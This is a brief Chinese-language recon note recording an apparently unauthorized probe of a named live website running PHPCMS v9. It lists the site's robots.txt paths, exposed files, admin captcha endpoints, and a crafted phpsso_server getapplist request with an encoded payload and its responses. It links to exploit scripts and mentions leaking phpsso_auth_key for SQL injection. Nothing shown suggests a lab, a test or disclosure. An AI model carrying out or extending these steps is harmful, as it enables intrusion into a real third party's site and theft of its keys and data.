思路

偶然，发现https://www.17xwg.com

一下是我的蛛丝马迹：

1.https://www.17xwg.com/content-11-798-1.html#comment_iframe      #号的利用

2.https://www.17xwg.com/rebots。txt

#
# robots.txt for PHPCMS v9
#
User-agent: * 
allow: /sitemaps.xml
Disallow: /caches
Disallow: /phpcms
Disallow: /install
Disallow: /phpsso_server
Disallow: /api
Disallow: /admin.php

3.
https://www.17xwg.com/bdunion.txt

09c34f67a8c9bcb9a111df10c43c9e02

https://www.17xwg.com/log.txt
返回大量值

4.验证码验证一直失败的原因

<label>验证码</label>

<input class="login_input" type="text" size="4" name="code">

 

<span>

<img id="code_img" src="http://admwg.17xwg.com/phpsso_server/api.php?op=checkcode&code_len=4&font_size=14&width=84&height=24&font=&font_color=&background=" onclick="this.src=this.src+"&"+Math.random()">

</span>

5.https://www.17xwg.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V
返回  0
包括https://www.17xwg.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V

返回  aaaaa()

6.https://zhuanlan.zhihu.com/p/26263513
exp脚本转发的利用

7.https://blog.csdn.net/wodafa/article/details/70596538
别人实战经验

8.https://www.secpulse.com/archives/30536.html

 设计缺陷可获取phpsso_auth_key（可用于sql注入等）

uid=x&ps_auth_key=phpsso_auth_key